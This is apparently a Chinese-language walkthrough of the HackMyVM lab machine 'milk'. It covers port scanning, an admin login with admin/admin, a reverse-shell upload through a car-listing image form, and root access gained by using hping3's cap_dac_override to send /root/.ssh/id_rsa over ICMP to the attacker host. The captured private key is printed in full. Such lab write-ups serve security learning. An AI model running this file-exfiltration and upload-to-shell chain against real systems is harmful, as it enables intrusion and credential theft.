hack-my-vm-milk

SunRT

2025-05-21

HACK-MY-VM

hack-my-vm-milk

端口探测

kali@kali [~] ➜  sudo nmap -sT -p- --min-rate 1000 192.168.108.13                                                                                [16:17:43]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-21 16:17 CST
Nmap scan report for 192.168.108.13
Host is up (0.0024s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:59:6D:18 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 3.71 seconds

端口渗透

找到了管理员登录入口，没啥意外，是一个弱密码：admin/admin

存在文件上传，这里是上传车的所有信息的，在上传之前，我们得创建车的品牌否则无法成功

尝试直接上传反弹shell

需要注意的是，某些字段必须是数字，否则就会上传失败，上传成功后，回到主页，查找售卖车辆，就能看见我们刚刚上传的车型

我们查看源码，寻找图片的地址

由此获得上传地址，访问即可拿到shell

kali@kali [~] ➜  nc -lvnp 8888                                                                                                                   [16:26:27]
listening on [any] 8888 ...
connect to [192.168.108.141] from (UNKNOWN) [192.168.108.13] 49820
bash: cannot set terminal process group (327): Inappropriate ioctl for device
bash: no job control in this shell
www-data@milk:~/html/admin/img/vehicleimages$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@milk:~/html/admin/img/vehicleimages$

权限提升

日常sudo -l 发现没东西，直接跑linpeas就行了，懒得一一枚举

1
2
3

Files with capabilities (limited to 50):
/usr/bin/ping = cap_net_raw+ep
/usr/sbin/hping3 = cap_dac_override,cap_net_raw+ep

我们发现hping3是有cap_dac_override能力的，这个是干啥的呢

cap_dac_override 让拥有它的进程可以无视传统的 Unix 文件权限检查，即使你没有读、写、执行权限，也可以访问文件（只要文件系统允许，且没有其他机制阻止，如 ACL、安全模块等）。

但是hping3就是一个ping工具，发送的是ICMP协议的东西，想办法用ICMP协议把数据带出来

www-data@milk:/tmp$ RHOST=192.168.108.141
RHOST=192.168.108.141
www-data@milk:/tmp$ LFILE=/root/.ssh/id_rsa
LFILE=/root/.ssh/id_rsa
www-data@milk:/tmp$ hping3 "$RHOST" --icmp --data 1500 --sign xxx --file "$LFILE"

向我们的攻击机发送ICMP协议报文，携带数据大小为1500字节，携带的是LFILE文件，这里携带的就是root的私钥

1	sudo tcpdump -i eth0 icmp -A

攻击端监听对应的网卡，指定监听icmp协议，-A 会将每个抓到的数据包的 Payload（负载部分）以 ASCII 文本形式打印出来，而不是十六进制

16:54:17.085408 IP 192.168.108.141 > 192.168.108.13: ICMP echo reply, id 39475, seq 6657, length 1480
E...QS .@.....l...l...aK.3..xxx-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAqPIkwTGMzRzGKaOUS4CAThkevhSAX9nF8ANZz9gz7rSIB9ZJlyaz
RbYSkWX24ScNj5PI4v/rOGXqHr27NcgYUKyQxg1LgBKgNDIWSnq/U99Ypt0AyPnrwewtRr
l1jjkHE4YvDotMG/RT7l8acCMYBJjfpokVPgcD1vxk8jUyWBsJgk/BDzkd4v5qdQjicbFm
q1sEs9Lj0c41rbgHIePCsUlgAjyrNa7PJ/WKRA+UYJgUcFil+mrnmFPUItzN/A1twPAue5
Jtdk+6ODrzaw0EA2Sdx4V0QDZDIItqLuXy36Wm+LncywTspruXL9vlFzP530JFHtsY1CrQ
4nd3milARQAAA8DbR0Jg20dCYAAAAAdzc2gtcnNhAAABAQCo8iTBMYzNHMYpo5RLgIBOGR
6+FIBf2cXwA1nP2DPutIgH1kmXJrNFthKRZfbhJw2Pk8ji/+s4Zeoevbs1yBhQrJDGDUuA
EqA0MhZKer9T31im3QDI+evB7C1GuXWOOQcThi8Oi0wb9FPuXxpwIxgEmN+miRU+BwPW/G
TyNTJYGwmCT8EPOR3i/mp1COJxsWarWwSz0uPRzjWtuAch48KxSWACPKs1rs8n9YpED5Rg
mBRwWKX6aueYU9Qi3M38DW3A8C57km12T7o4OvNrDQQDZJ3HhXRANkMgi2ou5fLfpab4ud
zLBOymu5cv2+UXM/nfQkUe2xjUKtDid3eaKUBFAAAAAwEAAQAAAQByRuhJreSZ0X7RJ47l
y1P+f8tls6RqMXpMMVgM2Se3rXHeKzq3/TuCSfghVaE7BxmLJuHZelZ3XaiRhrEdXe3kk/
WRoeiSBwdKhx7A3mqQpyDmLdOcHkE0eTbfAg/cVgLNWBR4eAzRU+F5+eZ+N57FbUrK8Srn
PAOC5lK56vXU1ct/c6YuLn0e9aD3Dx9HVmpsyDK4u4B/Tn+jpW83+Wx6CBIr6KWVK+9gut
4K2ZKi8DDI98aIXK3nf4J2Bwk/sC+Pr3Yde5dp/GZIHEXWosN3Mq11RsS3JW+FR0vmZOtL
UQbBtzAnc0QmJ9zRw2O2UMEf4i0THpNzW2nJyKoABkjBAAAAgAFAUlpNG57wSUK8QipFMV
Wbw+ipsquimPGClN1mNcJpLB0k8n7gS2M+VlsvpRmJuxN+vR779AJGJ7qo1g0Rj93erXSC
Y3lmkFM+TF19R5yfKnWzW4EqvRL6MprZ9rpUNOj8azZ0Xc36hzL3VHXvtz+hHeWlek+oBH
jNWJOFR2B6AAAAgQDXlrGG9ozkxC94jAxiWCMvS+poKgPeRO383yf9/aFwbMEZJxYSYhsi
J8TzMpcdk51uR
16:54:17.085437 IP 192.168.108.141 > 192.168.108.13: icmp
E..0QS..@.....l...l.CvaKAWt26cm8+r48l6/Z1pHNyUfD
16:54:18.086184 IP 192.168.108.13 > 192.168.108.141: ICMP echo request, id 39475, seq 6913, length 1480
E..... .@.....l...l......3..xxxbFbMll+gC2ft0T2stFcm1fonieTr0
DO8oyB5Jbr8Ow3iEMrmlcwt6tX8QQQXbDe4zqVZuNN4MD8CQAAAIEAyJ08IxoQ/6bq8STT
NUcn2jGzBn2BxRkbaKsNcwh3eH0rSeTNN2rBExuwNdUmA3BeViY2Sv7JHiHRqLRqlsHnau
9ScUf/XuSAkkEya7IOVFAPr+e3R7brgT43/P7lOFhBPr/bvMgyoJ8fdWFhs0oJdio8g6en
UXrcRI3NOE6+aV0AAAAJcm9vdEBtaWxrAQI=
-----END OPENSSH PRIVATE KEY-----
...............................................................................

从中提取公钥，登录root

kali@kali [~/web_shell_toos] ➜  ssh root@192.168.108.13 -i id_x                                                                             [17:00:17]
The authenticity of host '192.168.108.13 (192.168.108.13)' can't be established.
ED25519 key fingerprint is SHA256:0f7qVkf+B5ngX6Nc7MnxPMmpInzlPiWHdjGS3Vb9Pnc.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.108.13' (ED25519) to the list of known hosts.
Linux milk 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Feb 19 07:47:41 2021
root@milk:~# whoami
root
root@milk:~#